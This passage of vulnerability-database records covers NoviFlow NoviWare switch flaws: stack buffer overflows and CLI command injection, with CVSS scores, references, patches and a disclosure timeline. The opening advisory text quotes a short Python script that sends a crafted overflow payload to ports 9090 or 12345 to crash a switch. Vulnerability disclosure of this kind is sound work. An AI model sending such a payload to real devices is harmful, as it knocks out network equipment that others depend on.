overflow\nwhen unpacking serialized values. \n\nReproduction\n------------------\nIf TCP ports 9090 or 12345 are accepting connections from the network,\nthe following python script can be used to cause a crash on vulnerable\nversions :\n---\nfrom struct import pack\nimport socket\n\ns = socket.socket()\ns.connect((\u003cswitch host\u003e, \u003c9090 or 12345\u003e))\n\npayload = \"\".join([pack(\"\u003cI\", 4) + \"AAAA\" for i in xrange(408)])\npayload = pack(\"\u003cIIQ\", 0, len(payload) + 16, 0) + payload\ns.sendall(payload)\n\ns.read(1)\ns.close()\n---\n\nA watchdog should restart the service if it has crashed. \n\nRemediation\n-----------------\n- Upgrade to NoviWare400 3.0 or later. \n- NoviFlow customers should have received instructions on how to get\nthe latest release along with release notes. For more information,\ncontact support@noviflow.com. \n\n\nDisclosure timeline\n===============\n2017/05/11 - Report sent to NoviFlow\n2017/05/26 - Bugs acknowledged and remediation timeline confirmed\n2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities\n2017/08/09 - CVE requests\n2017/08/16 - Public disclosure\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12786"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007314"
},
{
"db": "CNVD",
"id": "CNVD-2017-29532"
},
{
"db": "VULMON",
"id": "CVE-2017-12786"
},
{
"db": "PACKETSTORM",
"id": "143818"
}
],
"trust": 2.34
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=42518",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-12786"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-12786",
"trust": 3.2
},
{
"db": "EXPLOIT-DB",
"id": "42518",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007314",
"trust": 0.8
},
{
"db": "EXPLOITDB",
"id": "42518",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2017-29532",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201708-458",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2017-12786",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "143818",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-29532"
},
{
"db": "VULMON",
"id": "CVE-2017-12786"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007314"
},
{
"db": "PACKETSTORM",
"id": "143818"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-458"
},
{
"db": "NVD",
"id": "CVE-2017-12786"
}
]
},
"id": "VAR-201708-1146",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-29532"
}
],
"trust": 0.92692307
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-29532"
}
]
},
"last_update_date": "2025-04-20T23:04:26.261000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "NoviWare",
"trust": 0.8,
"url": "https://noviflow.com/products/noviware/"
},
{
"title": "Patch for NoviFlowNoviWare and NoviSwitch Device Stack Buffer Overflow Vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/103389"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-29532"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007314"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-007314"
},
{
"db": "NVD",
"id": "CVE-2017-12786"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.exploit-db.com/exploits/42518/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12786"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12786"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12787"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12785"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-29532"
},
{
"db": "VULMON",
"id": "CVE-2017-12786"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007314"
},
{
"db": "PACKETSTORM",
"id": "143818"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-458"
},
{
"db": "NVD",
"id": "CVE-2017-12786"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-29532"
},
{
"db": "VULMON",
"id": "CVE-2017-12786"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007314"
},
{
"db": "PACKETSTORM",
"id": "143818"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-458"
},
{
"db": "NVD",
"id": "CVE-2017-12786"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-29532"
},
{
"date": "2017-08-22T00:00:00",
"db": "VULMON",
"id": "CVE-2017-12786"
},
{
"date": "2017-09-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-007314"
},
{
"date": "2017-08-18T23:44:44",
"db": "PACKETSTORM",
"id": "143818"
},
{
"date": "2017-08-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201708-458"
},
{
"date": "2017-08-22T17:29:00.240000",
"db": "NVD",
"id": "CVE-2017-12786"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-29532"
},
{
"date": "2017-08-29T00:00:00",
"db": "VULMON",
"id": "CVE-2017-12786"
},
{
"date": "2017-09-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-007314"
},
{
"date": "2017-08-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201708-458"
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2017-12786"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201708-458"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "NoviWare Buffer error vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-007314"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201708-458"
}
],
"trust": 0.6
}
}
VAR-202008-0023
Vulnerability from variot - Updated: 2024-11-23 22:21The novish command-line interface, included in NoviFlow NoviWare before NW500.2.12 and deployed on NoviSwitch devices, is vulnerable to command injection in the "show status destination ipaddr" command. This could be used by a read-only user (monitoring group) or admin to execute commands on the operating system. NoviFlow NoviWare To OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202008-0023",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "noviware",
"scope": "lte",
"trust": 1.0,
"vendor": "noviflow",
"version": "nw500.2.12"
},
{
"model": "noviware",
"scope": "eq",
"trust": 0.8,
"vendor": "noviflow",
"version": "nw500.2.12"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-009600"
},
{
"db": "NVD",
"id": "CVE-2020-13122"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:noviflow:noviware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-009600"
}
]
},
"cve": "CVE-2020-13122",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 8.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2020-13122",
"impactScore": 8.5,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 8.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2020-009600",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2020-13122",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-009600",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-13122",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-009600",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202008-854",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-009600"
},
{
"db": "CNNVD",
"id": "CNNVD-202008-854"
},
{
"db": "NVD",
"id": "CVE-2020-13122"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The novish command-line interface, included in NoviFlow NoviWare before NW500.2.12 and deployed on NoviSwitch devices, is vulnerable to command injection in the \"show status destination ipaddr\" command. This could be used by a read-only user (monitoring group) or admin to execute commands on the operating system. NoviFlow NoviWare To OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-13122"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-009600"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-13122",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2020-009600",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202008-854",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-009600"
},
{
"db": "CNNVD",
"id": "CNNVD-202008-854"
},
{
"db": "NVD",
"id": "CVE-2020-13122"
}
]
},
"id": "VAR-202008-0023",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.32692307
},
"last_update_date": "2024-11-23T22:21:04.502000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "NoviWare",
"trust": 0.8,
"url": "https://noviflow.com/noviware/"
},
{
"title": "NoviFlow NoviWare NW500 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=126541"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-009600"
},
{
"db": "CNNVD",
"id": "CNNVD-202008-854"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-009600"
},
{
"db": "NVD",
"id": "CVE-2020-13122"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://drive.google.com/file/d/1il4cc0zbqk9s190dbfqd7mwybbh-vljb/view?usp=sharing"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13122"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-13122"
},
{
"trust": 0.8,
"url": "https://drive.google.com/file/d/1il4cc0zbqk9s190dbfqd7mwybbh-vljb/view"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-009600"
},
{
"db": "CNNVD",
"id": "CNNVD-202008-854"
},
{
"db": "NVD",
"id": "CVE-2020-13122"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2020-009600"
},
{
"db": "CNNVD",
"id": "CNNVD-202008-854"
},
{
"db": "NVD",
"id": "CVE-2020-13122"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-11-20T06:26:58",
"db": "JVNDB",
"id": "JVNDB-2020-009600"
},
{
"date": "2020-08-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202008-854"
},
{
"date": "2020-08-17T16:15:13.107000",
"db": "NVD",
"id": "CVE-2020-13122"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-11-20T06:26:58",
"db": "JVNDB",
"id": "JVNDB-2020-009600"
},
{
"date": "2021-01-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202008-854"
},
{
"date": "2024-11-21T05:00:42.163000",
"db": "NVD",
"id": "CVE-2020-13122"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202008-854"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "NoviFlow NoviWare In OS Command injection vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-009600"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202008-854"
}
],
"trust": 0.6
}
}
CVE-2020-13122 (GCVE-0-2020-13122)
Vulnerability from nvd – Published: 2020-08-17 15:59 – Updated: 2024-08-04 12:11
VLAI?
Summary
The novish command-line interface, included in NoviFlow NoviWare before NW500.2.12 and deployed on NoviSwitch devices, is vulnerable to command injection in the "show status destination ipaddr" command. This could be used by a read-only user (monitoring group) or admin to execute commands on the operating system.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T12:11:18.611Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://drive.google.com/file/d/1iL4cc0ZbQK9s190DbFQD7mWYbBH-vlJb/view?usp=sharing"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2020-06-17T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The novish command-line interface, included in NoviFlow NoviWare before NW500.2.12 and deployed on NoviSwitch devices, is vulnerable to command injection in the \"show status destination ipaddr\" command. This could be used by a read-only user (monitoring group) or admin to execute commands on the operating system."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-08-17T15:59:25",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://drive.google.com/file/d/1iL4cc0ZbQK9s190DbFQD7mWYbBH-vlJb/view?usp=sharing"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2020-13122",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The novish command-line interface, included in NoviFlow NoviWare before NW500.2.12 and deployed on NoviSwitch devices, is vulnerable to command injection in the \"show status destination ipaddr\" command. This could be used by a read-only user (monitoring group) or admin to execute commands on the operating system."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://drive.google.com/file/d/1iL4cc0ZbQK9s190DbFQD7mWYbBH-vlJb/view?usp=sharing",
"refsource": "MISC",
"url": "https://drive.google.com/file/d/1iL4cc0ZbQK9s190DbFQD7mWYbBH-vlJb/view?usp=sharing"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2020-13122",
"datePublished": "2020-08-17T15:59:25",
"dateReserved": "2020-05-16T00:00:00",
"dateUpdated": "2024-08-04T12:11:18.611Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2017-12787 (GCVE-0-2017-12787)
Vulnerability from nvd – Published: 2017-08-22 17:00 – Updated: 2024-08-05 18:51
VLAI?
Summary
A network interface of the novi_process_manager_daemon service, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because incoming packet data can contain embedded OS commands, and can also trigger a stack-based buffer overflow.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T18:51:07.224Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "42518",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/42518/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2017-08-22T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "A network interface of the novi_process_manager_daemon service, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because incoming packet data can contain embedded OS commands, and can also trigger a stack-based buffer overflow."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-22T16:57:02",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "42518",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/42518/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-12787",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A network interface of the novi_process_manager_daemon service, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because incoming packet data can contain embedded OS commands, and can also trigger a stack-based buffer overflow."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "42518",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/42518/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-12787",
"datePublished": "2017-08-22T17:00:00",
"dateReserved": "2017-08-10T00:00:00",
"dateUpdated": "2024-08-05T18:51:07.224Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2017-12786 (GCVE-0-2017-12786)
Vulnerability from nvd – Published: 2017-08-22 17:00 – Updated: 2024-08-05 18:51
VLAI?
Summary
Network interfaces of the cliengine and noviengine services, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because there is a stack-based buffer overflow during unserialization of packet data.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T18:51:06.333Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "42518",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/42518/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2017-08-22T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Network interfaces of the cliengine and noviengine services, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because there is a stack-based buffer overflow during unserialization of packet data."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-22T16:57:02",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
